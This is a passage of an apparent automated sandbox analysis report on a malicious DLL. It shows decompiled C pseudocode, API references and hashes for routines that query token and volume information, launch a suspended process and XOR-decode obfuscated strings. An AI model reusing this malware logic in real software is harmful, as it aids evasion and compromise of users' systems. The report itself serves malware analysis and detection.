                                                                                                                                                                          0x1000d146
                                                                                                                                                                          0x1000d14c
                                                                                                                                                                          0x1000d14e
                                                                                                                                                                          0x1000d156
                                                                                                                                                                          0x1000d164
                                                                                                                                                                          0x1000d169
                                                                                                                                                                          0x1000d178
                                                                                                                                                                          0x1000d17d
                                                                                                                                                                          0x1000d184
                                                                                                                                                                          0x1000d191
                                                                                                                                                                          0x1000d1ab
                                                                                                                                                                          0x1000d1b0
                                                                                                                                                                          0x1000d1b2
                                                                                                                                                                          0x1000d1b9
                                                                                                                                                                          0x1000d1c9
                                                                                                                                                                          0x1000d1da
                                                                                                                                                                          0x1000d1e4
                                                                                                                                                                          0x1000d1ec
                                                                                                                                                                          0x1000d1f3
                                                                                                                                                                          0x1000d1f6
                                                                                                                                                                          0x1000d213

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C
                                                                                                                                                                          • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000D1AB
                                                                                                                                                                            • Part of subcall function 1000C172: _vsnwprintf.MSVCRT ref: 1000C18F
                                                                                                                                                                          • lstrcatW.KERNEL32(?,00000114), ref: 1000D1E4
                                                                                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 1000D1F6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatmemset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3467380347-0
                                                                                                                                                                          • Opcode ID: dccfd8cb8e22ed0210f33860bbd810d879a5a769ac73bc817993e2aa5ca97174
                                                                                                                                                                          • Instruction ID: e401c8bce79da03c818e680b56469f360460cf51717d93477c68a4169e5f006f
                                                                                                                                                                          • Opcode Fuzzy Hash: dccfd8cb8e22ed0210f33860bbd810d879a5a769ac73bc817993e2aa5ca97174
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E2192B6A00218BFE710DBA4DC8AFEE77BDEB44350F104579F505D7186EA74AE448B60
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 316 1000dc93-1000dcb3 GetTokenInformation 317 1000dcb5-1000dcbe GetLastError 316->317 318 1000dcf9 316->318 317->318 319 1000dcc0-1000dcd0 call 100091e7 317->319 320 1000dcfb-1000dcff 318->320 323 1000dcd2-1000dcd4 319->323 324 1000dcd6-1000dce9 GetTokenInformation 319->324 323->320 324->318 325 1000dceb-1000dcf7 call 10009203 324->325 325->323
                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                          			E1000DC93(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                                                                                          				long _v8;
                                                                                                                                                                          				void* _v12;
                                                                                                                                                                          				void* _t12;
                                                                                                                                                                          				void* _t20;
                                                                                                                                                                          				void* _t22;
                                                                                                                                                                          				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                                                                                          				void* _t31;
                                                                                                                                                                          
                                                                                                                                                                          				_push(_t22);
                                                                                                                                                                          				_push(_t22);
                                                                                                                                                                          				_t31 = 0;
                                                                                                                                                                          				_t28 = __edx;
                                                                                                                                                                          				_t20 = _t22;
                                                                                                                                                                          				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                          					L6:
                                                                                                                                                                          					_t12 = _t31;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					_t31 = E100091E7(_v8);
                                                                                                                                                                          					_v12 = _t31;
                                                                                                                                                                          					if(_t31 != 0) {
                                                                                                                                                                          						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                                                                                          							goto L6;
                                                                                                                                                                          						} else {
                                                                                                                                                                          							E10009203( &_v12, _t16);
                                                                                                                                                                          							goto L3;
                                                                                                                                                                          						}
                                                                                                                                                                          					} else {
                                                                                                                                                                          						L3:
                                                                                                                                                                          						_t12 = 0;
                                                                                                                                                                          					}
                                                                                                                                                                          				}
                                                                                                                                                                          				return _t12;
                                                                                                                                                                          			}










                                                                                                                                                                          0x1000dc96
                                                                                                                                                                          0x1000dc97
                                                                                                                                                                          0x1000dc9e
                                                                                                                                                                          0x1000dca6
                                                                                                                                                                          0x1000dcaa
                                                                                                                                                                          0x1000dcb3
                                                                                                                                                                          0x1000dcf9
                                                                                                                                                                          0x1000dcf9
                                                                                                                                                                          0x1000dcc0
                                                                                                                                                                          0x1000dcc8
                                                                                                                                                                          0x1000dcca
                                                                                                                                                                          0x1000dcd0
                                                                                                                                                                          0x1000dce9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000dceb
                                                                                                                                                                          0x1000dcf0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000dcf6
                                                                                                                                                                          0x1000dcd2
                                                                                                                                                                          0x1000dcd2
                                                                                                                                                                          0x1000dcd2
                                                                                                                                                                          0x1000dcd2
                                                                                                                                                                          0x1000dcd0
                                                                                                                                                                          0x1000dcff

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,10000000,00000000,00000000,?,1000DD14,00000000,00000000,?,1000DD3D), ref: 1000DCAE
                                                                                                                                                                          • GetLastError.KERNEL32(?,1000DD14,00000000,00000000,?,1000DD3D,00001644,?,1000BCC2), ref: 1000DCB5
                                                                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,1000DD14,00000000,00000000,?,1000DD3D,00001644,?,1000BCC2), ref: 1000DCE4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InformationToken$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2567405617-0
                                                                                                                                                                          • Opcode ID: b2dc6801a2c542b43811d510dcddeb5285962dfb57cdae12c43fd21f7238ed39
                                                                                                                                                                          • Instruction ID: 9a7a69b10fe3764d9cd2296672b65be2c5230f9efb3b633d2ad7adf520ad261b
                                                                                                                                                                          • Opcode Fuzzy Hash: b2dc6801a2c542b43811d510dcddeb5285962dfb57cdae12c43fd21f7238ed39
                                                                                                                                                                          • Instruction Fuzzy Hash: A6017C7660022ABFBB20EBA5DD89DCF7FAEEB456E17210426F905D2111EA71DD40C6B0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 355 10009d63-10009d78 356 10009d7a-10009d8b 355->356 357 10009d9e-10009dbc GetNumberFormatA 355->357 358 10009d97-10009d9c 356->358 359 10009d8d-10009d90 356->359 360 10009dc8 357->360 361 10009dbe 357->361 358->357 359->356 363 10009d92-10009d95 359->363 362 10009dca-10009dce 360->362 364 10009dc0-10009dc4 361->364 362->362 366 10009dd0-10009de2 call 100091e7 362->366 363->357 364->364 365 10009dc6 364->365 365->366 369 10009de4-10009de9 366->369 370 10009deb-10009ded 366->370 371 10009e0f-10009e13 369->371 372 10009e0d 370->372 373 10009def-10009e0b 370->373 372->371 373->372 373->373
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E10009D63(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                          				char _v88;
                                                                                                                                                                          				int _t19;
                                                                                                                                                                          				struct _numberfmt* _t29;
                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                          				signed int _t34;
                                                                                                                                                                          				struct _numberfmt* _t36;
                                                                                                                                                                          				void* _t38;
                                                                                                                                                                          				void* _t41;
                                                                                                                                                                          				struct _numberfmt* _t44;
                                                                                                                                                                          				signed int _t45;
                                                                                                                                                                          
                                                                                                                                                                          				_t41 = __edx;
                                                                                                                                                                          				_t45 = _a12;
                                                                                                                                                                          				_t44 = 0;
                                                                                                                                                                          				_v8 = __ecx;
                                                                                                                                                                          				_t33 = 0;
                                                                                                                                                                          				if(_t45 >= __edx) {
                                                                                                                                                                          					L5:
                                                                                                                                                                          					_t19 = GetNumberFormatA(0x7d3, 0xb4, "electricmadness", _t44,  &_v88, 0x22); // executed
                                                                                                                                                                          					if(_t19 != 0) {
                                                                                                                                                                          						_t36 = _t44;
                                                                                                                                                                          						do {
                                                                                                                                                                          							_t36 = _t36 + 1;
                                                                                                                                                                          						} while (_t36 < 0x22);
                                                                                                                                                                          						L11:
                                                                                                                                                                          						_t38 = E100091E7(2 + _t33 * 2);
                                                                                                                                                                          						if(_t38 != 0) {
                                                                                                                                                                          							if(_t33 == 0) {
                                                                                                                                                                          								L15:
                                                                                                                                                                          								return _t38;
                                                                                                                                                                          							} else {
                                                                                                                                                                          								goto L14;
                                                                                                                                                                          							}
                                                                                                                                                                          							do {
                                                                                                                                                                          								L14:
                                                                                                                                                                          								 *((short*)(_t38 + _t44 * 2)) = ( *((_t45 & 0x0000007f) + _a4) ^  *(_t45 + _v8)) & 0x000000ff;
                                                                                                                                                                          								_t44 = _t44 + 1;
                                                                                                                                                                          								_t45 = _t45 + 1;
                                                                                                                                                                          							} while (_t44 < _t33);
                                                                                                                                                                          							goto L15;
                                                                                                                                                                          						}
                                                                                                                                                                          						return 0x100210ac;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t29 = _t44;
                                                                                                                                                                          					do {
                                                                                                                                                                          						_t29 = _t29 + 1;
                                                                                                                                                                          					} while (_t29 < 0x14);
                                                                                                                                                                          					goto L11;
                                                                                                                                                                          				}
                                                                                                                                                                          				while( *((_t45 & 0x0000007f) + _a4) !=  *(_t45 + _v8)) {
                                                                                                                                                                          					_t45 = _t45 + 1;
                                                                                                                                                                          					if(_t45 < _t41) {
                                                                                                                                                                          						continue;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t45 = _a12;
                                                                                                                                                                          					goto L5;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t34 = _t45;
                                                                                                                                                                          				_t45 = _a12;
                                                                                                                                                                          				_t33 = _t34 - _t45;
                                                                                                                                                                          				goto L5;
                                                                                                                                                                          			}














                                                                                                                                                                          0x10009d63
                                                                                                                                                                          0x10009d6b
                                                                                                                                                                          0x10009d6f
                                                                                                                                                                          0x10009d71
                                                                                                                                                                          0x10009d74
                                                                                                                                                                          0x10009d78
                                                                                                                                                                          0x10009d9e
                                                                                                                                                                          0x10009db4
                                                                                                                                                                          0x10009dbc
                                                                                                                                                                          0x10009dc8
                                                                                                                                                                          0x10009dca
                                                                                                                                                                          0x10009dca
                                                                                                                                                                          0x10009dcb
                                                                                                                                                                          0x10009dd0
                                                                                                                                                                          0x10009dde
                                                                                                                                                                          0x10009de2
                                                                                                                                                                          0x10009ded
                                                                                                                                                                          0x10009e0d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009def
                                                                                                                                                                          0x10009def
                                                                                                                                                                          0x10009e03
                                                                                                                                                                          0x10009e07
                                                                                                                                                                          0x10009e08
                                                                                                                                                                          0x10009e09
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009def
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009de4
                                                                                                                                                                          0x10009dbe
                                                                                                                                                                          0x10009dc0
                                                                                                                                                                          0x10009dc0
                                                                                                                                                                          0x10009dc1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009dc6
                                                                                                                                                                          0x10009d7a
                                                                                                                                                                          0x10009d8d
                                                                                                                                                                          0x10009d90
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009d92
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009d92
                                                                                                                                                                          0x10009d97
                                                                                                                                                                          0x10009d99
                                                                                                                                                                          0x10009d9c
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FormatNumber
                                                                                                                                                                          • String ID: electricmadness
                                                                                                                                                                          • API String ID: 481257995-1127315026
                                                                                                                                                                          • Opcode ID: 474225535248c1eba899f2fb2680a2b2a95483c582a0e8dd64a7220fedecc991
                                                                                                                                                                          • Instruction ID: aab1a026c2f2c5a5b26f8d8130129cea483a76aafec3bdca2fedd0ee807baeb0
                                                                                                                                                                          • Opcode Fuzzy Hash: 474225535248c1eba899f2fb2680a2b2a95483c582a0e8dd64a7220fedecc991
                                                                                                                                                                          • Instruction Fuzzy Hash: 92117F327043955BEB10EF98CC856AE37A5DF852D0B51406AFD92DB259D670EC42C390
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 374 10009cbf-10009cd2 375 10009cd4 374->375 376 10009ce9-10009d09 GetNumberFormatA 374->376 379 10009cd7-10009ce2 375->379 377 10009d51-10009d55 376->377 378 10009d0b-10009d0f 376->378 377->377 381 10009d57 377->381 378->378 380 10009d11 378->380 382 10009d13-10009d15 379->382 383 10009ce4-10009ce7 379->383 380->381 385 10009d5c 381->385 382->376 384 10009d17-10009d1b call 100091e7 382->384 383->376 383->379 388 10009d20-10009d28 384->388 387 10009d5e-10009d62 385->387 389 10009d31-10009d36 388->389 390 10009d2a-10009d2f 388->390 391 10009d38-10009d4a 389->391 390->387 391->391 392 10009d4c-10009d4f 391->392 392->385
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E10009CBF(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                          				char _v88;
                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                          				struct _numberfmt* _t27;
                                                                                                                                                                          				intOrPtr _t28;
                                                                                                                                                                          				intOrPtr _t29;
                                                                                                                                                                          				signed int _t30;
                                                                                                                                                                          				signed int _t32;
                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                          				void* _t34;
                                                                                                                                                                          				void* _t36;
                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                          				void* _t39;
                                                                                                                                                                          
                                                                                                                                                                          				_t34 = __edx;
                                                                                                                                                                          				_t29 = __ecx;
                                                                                                                                                                          				_t37 = _a12;
                                                                                                                                                                          				_t38 = _t37;
                                                                                                                                                                          				_v8 = __ecx;
                                                                                                                                                                          				if(_t37 >= __edx) {
                                                                                                                                                                          					L4:
                                                                                                                                                                          					_t27 = 0;
                                                                                                                                                                          					if(GetNumberFormatA(0xdc, 0x172, "chickenfried", 0,  &_v88, 0x22) != 0) {
                                                                                                                                                                          						do {
                                                                                                                                                                          							_t27 = _t27 + 1;
                                                                                                                                                                          						} while (_t27 < 0x22);
                                                                                                                                                                          						L14:
                                                                                                                                                                          						_t30 = 0x1002107e;
                                                                                                                                                                          						L15:
                                                                                                                                                                          						return _t30;
                                                                                                                                                                          					} else {
                                                                                                                                                                          						goto L5;
                                                                                                                                                                          					}
                                                                                                                                                                          					do {
                                                                                                                                                                          						L5:
                                                                                                                                                                          						_t27 = _t27 + 1;
                                                                                                                                                                          					} while (_t27 < 0x14);
                                                                                                                                                                          					goto L14;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t28 = _a4;
                                                                                                                                                                          				while( *((intOrPtr*)((_t38 & 0x0000007f) + _t28)) !=  *((intOrPtr*)(_t38 + _t29))) {
                                                                                                                                                                          					_t38 = _t38 + 1;
                                                                                                                                                                          					if(_t38 < _t34) {
                                                                                                                                                                          						continue;
                                                                                                                                                                          					}
                                                                                                                                                                          					goto L4;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t39 = _t38 - _t37;
                                                                                                                                                                          				if(_t39 == 0) {
                                                                                                                                                                          					goto L4;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t21 = E100091E7(_t39 + 1); // executed
                                                                                                                                                                          				_t32 = _t21;
                                                                                                                                                                          				_a12 = _t32;
                                                                                                                                                                          				if(_t32 != 0) {
                                                                                                                                                                          					_t33 = _v8;
                                                                                                                                                                          					_t36 = _t32 - _t37;
                                                                                                                                                                          					do {
                                                                                                                                                                          						 *(_t36 + _t37) =  *((_t37 & 0x0000007f) + _t28) ^  *(_t37 + _t33);
                                                                                                                                                                          						_t37 = _t37 + 1;
                                                                                                                                                                          						_t39 = _t39 - 1;
                                                                                                                                                                          					} while (_t39 != 0);
                                                                                                                                                                          					_t30 = _a12;
                                                                                                                                                                          					goto L15;
                                                                                                                                                                          				}
                                                                                                                                                                          				return 0x1002107e;
                                                                                                                                                                          			}

















                                                                                                                                                                          0x10009cbf
                                                                                                                                                                          0x10009cbf
                                                                                                                                                                          0x10009cc8
                                                                                                                                                                          0x10009ccb
                                                                                                                                                                          0x10009ccd
                                                                                                                                                                          0x10009cd2
                                                                                                                                                                          0x10009ce9
                                                                                                                                                                          0x10009cee
                                                                                                                                                                          0x10009d09
                                                                                                                                                                          0x10009d51
                                                                                                                                                                          0x10009d51
                                                                                                                                                                          0x10009d52
                                                                                                                                                                          0x10009d57
                                                                                                                                                                          0x10009d57
                                                                                                                                                                          0x10009d5c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009d0b
                                                                                                                                                                          0x10009d0b
                                                                                                                                                                          0x10009d0b
                                                                                                                                                                          0x10009d0c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009d11
                                                                                                                                                                          0x10009cd4
                                                                                                                                                                          0x10009cd7
                                                                                                                                                                          0x10009ce4
                                                                                                                                                                          0x10009ce7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009ce7
                                                                                                                                                                          0x10009d13
                                                                                                                                                                          0x10009d15
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009d1b
                                                                                                                                                                          0x10009d21
                                                                                                                                                                          0x10009d23
                                                                                                                                                                          0x10009d28
                                                                                                                                                                          0x10009d33
                                                                                                                                                                          0x10009d36
                                                                                                                                                                          0x10009d38
                                                                                                                                                                          0x10009d43
                                                                                                                                                                          0x10009d46
                                                                                                                                                                          0x10009d47
                                                                                                                                                                          0x10009d47
                                                                                                                                                                          0x10009d4c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009d4c
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FormatNumber
                                                                                                                                                                          • String ID: chickenfried
                                                                                                                                                                          • API String ID: 481257995-586419266
                                                                                                                                                                          • Opcode ID: 7b62fe72fc9e894a0981e184735d60e8b91222583dd436eba39048155e1f2965
                                                                                                                                                                          • Instruction ID: c59e46062cbfb6ba45e4af24f1aa4b5ee3d0c5177bb5fc11745f9e327f620478
                                                                                                                                                                          • Opcode Fuzzy Hash: 7b62fe72fc9e894a0981e184735d60e8b91222583dd436eba39048155e1f2965
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D117D35B083955FFB10CE6C8884A9E77AADB851C0B62406BF9929B25AD530DC018350
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 393 1000cb78-1000cbc7 call 1000936a * 2 CreateProcessW
                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                          			E1000CB78(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                                                                                                                                                          				struct _STARTUPINFOW _v72;
                                                                                                                                                                          				signed int _t11;
                                                                                                                                                                          
                                                                                                                                                                          				E1000936A(__edx, 0, 0x10);
                                                                                                                                                                          				E1000936A( &_v72, 0, 0x44);
                                                                                                                                                                          				_v72.cb = 0x44;
                                                                                                                                                                          				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
                                                                                                                                                                          				asm("sbb eax, eax");
                                                                                                                                                                          				return  ~( ~_t11) - 1;
                                                                                                                                                                          			}





                                                                                                                                                                          0x1000cb89
                                                                                                                                                                          0x1000cb96
                                                                                                                                                                          0x1000cb9e
                                                                                                                                                                          0x1000cbba
                                                                                                                                                                          0x1000cbc0
                                                                                                                                                                          0x1000cbc7

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C
                                                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 1000CBBA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateProcessmemset
                                                                                                                                                                          • String ID: D
                                                                                                                                                                          • API String ID: 2296119082-2746444292
                                                                                                                                                                          • Opcode ID: 34803733cb6db3f162df24bd21a5bbeea5bb7e3b92db20e3214360199722d846
                                                                                                                                                                          • Instruction ID: 07932fc84ff427775a204e18f3fe0ba77352146c5b198283cf31ed6b76e6a132
                                                                                                                                                                          • Opcode Fuzzy Hash: 34803733cb6db3f162df24bd21a5bbeea5bb7e3b92db20e3214360199722d846
                                                                                                                                                                          • Instruction Fuzzy Hash: A4F065F16406187FF720DA65CC0AFBF36ACDB85750F504125BB09EB1C1E5A0BE0586B5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                          			E10001494(void* __edi, void* __fp0) {
                                                                                                                                                                          				char _v8;
                                                                                                                                                                          				void* __ecx;
                                                                                                                                                                          				char _t19;
                                                                                                                                                                          				intOrPtr _t22;
                                                                                                                                                                          				intOrPtr _t24;
                                                                                                                                                                          				intOrPtr _t25;
                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                          				signed int _t31;
                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                          				intOrPtr* _t36;
                                                                                                                                                                          				void* _t37;
                                                                                                                                                                          				intOrPtr _t40;
                                                                                                                                                                          				void* _t50;
                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                          				void* _t56;
                                                                                                                                                                          				void* _t58;
                                                                                                                                                                          				signed int _t60;
                                                                                                                                                                          				char _t62;
                                                                                                                                                                          
                                                                                                                                                                          				_t68 = __fp0;
                                                                                                                                                                          				E100015D4();
                                                                                                                                                                          				_t19 = E100091E7(0x20);
                                                                                                                                                                          				_v8 = _t19;
                                                                                                                                                                          				_t54 = 0x1f;
                                                                                                                                                                          				do {
                                                                                                                                                                          					_t2 = _t54 + 0x63; // 0x82
                                                                                                                                                                          					 *((char*)(_t54 + _t19)) = _t2;
                                                                                                                                                                          					_t54 = _t54 - 1;
                                                                                                                                                                          				} while (_t54 >= 0);
                                                                                                                                                                          				E10009203( &_v8, 0);
                                                                                                                                                                          				_t22 = E1000BC31(_t54, __fp0); // executed
                                                                                                                                                                          				 *0x10020fd8 = _t22;
                                                                                                                                                                          				if(_t22 != 0) {
                                                                                                                                                                          					E1001433B( *((intOrPtr*)(_t22 + 0x224)));
                                                                                                                                                                          					_t24 =  *0x10020fd8; // 0x110fc50
                                                                                                                                                                          					_t60 = 1;
                                                                                                                                                                          					_t50 = _t58;
                                                                                                                                                                          					__eflags =  *((intOrPtr*)(_t24 + 0x101c)) - 1;
                                                                                                                                                                          					if( *((intOrPtr*)(_t24 + 0x101c)) == 1) {
                                                                                                                                                                          						__imp__CoInitializeEx(0, 6, __edi);
                                                                                                                                                                          						_t30 =  *0x10020fd8; // 0x110fc50
                                                                                                                                                                          						_push(0);
                                                                                                                                                                          						_push(0x1001d9b8);
                                                                                                                                                                          						_t31 = _t30 + 0x228;
                                                                                                                                                                          						__eflags = _t31;
                                                                                                                                                                          						_push(_t31);
                                                                                                                                                                          						_t56 = E100099EC(0x1001d9b8);
                                                                                                                                                                          						_t62 = E100016EC(0x1001d9b8, 0x2a);
                                                                                                                                                                          						_v8 = _t62;
                                                                                                                                                                          						while(1) {
                                                                                                                                                                          							_t52 =  *0x10020fd8; // 0x110fc50
                                                                                                                                                                          							_t34 =  *0x10020fc0; // 0x110fa38
                                                                                                                                                                          							_t36 =  *0x10020fb4; // 0x110fc18
                                                                                                                                                                          							_t37 =  *_t36( *((intOrPtr*)(_t34 + 0x54))(_t62, _t52 + 0x1644, _t56, 0, 0));
                                                                                                                                                                          							__eflags = _t37 - 5;
                                                                                                                                                                          							if(_t37 != 5) {
                                                                                                                                                                          								break;
                                                                                                                                                                          							}
                                                                                                                                                                          							Sleep(0x7d0);
                                                                                                                                                                          						}
                                                                                                                                                                          						E10009E2E( &_v8);
                                                                                                                                                                          						_t40 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          						_pop(_t50);
                                                                                                                                                                          						 *((intOrPtr*)(_t40 + 0xec))(0);
                                                                                                                                                                          						_t24 =  *0x10020fd8; // 0x110fc50
                                                                                                                                                                          						_t60 = 1;
                                                                                                                                                                          						__eflags = 1;
                                                                                                                                                                          					}
                                                                                                                                                                          					__eflags =  *(_t24 + 0x1898) & 0x00010083;
